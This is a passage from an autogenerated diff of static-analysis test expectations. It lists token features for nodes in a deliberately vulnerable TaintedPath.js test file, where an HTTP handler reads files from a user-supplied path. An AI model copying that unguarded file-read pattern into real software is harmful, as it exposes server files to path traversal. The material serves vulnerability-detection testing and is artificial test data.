path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:9 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:9 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:15 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:15 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:15 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:15 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:15 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:7:24:38 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:11:24:15 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:11:24:15 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:11:24:15 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:11:24:15 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:11:24:15 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:18 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:18 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:18 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:18 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:31 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:31 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:31 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:31 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:31 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4802,6 +58732,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:24:17:24:37 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:24:20:24:31 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:20:24:31 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:24:20:24:31 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:24:20:24:31 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:24:20:24:31 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | calleeImports | fs | @@ -4811,6 +58746,71 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:24:33:24:36 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path === 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path === 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path === 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path === 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:26:7:26:24 | path === 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:26:16:26:24 | 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:16:26:24 | 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:26:16:26:24 | 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:26:16:26:24 | 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:26:16:26:24 | 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:5:27:36 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:9:27:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:9:27:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:9:27:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:9:27:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:9:27:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res 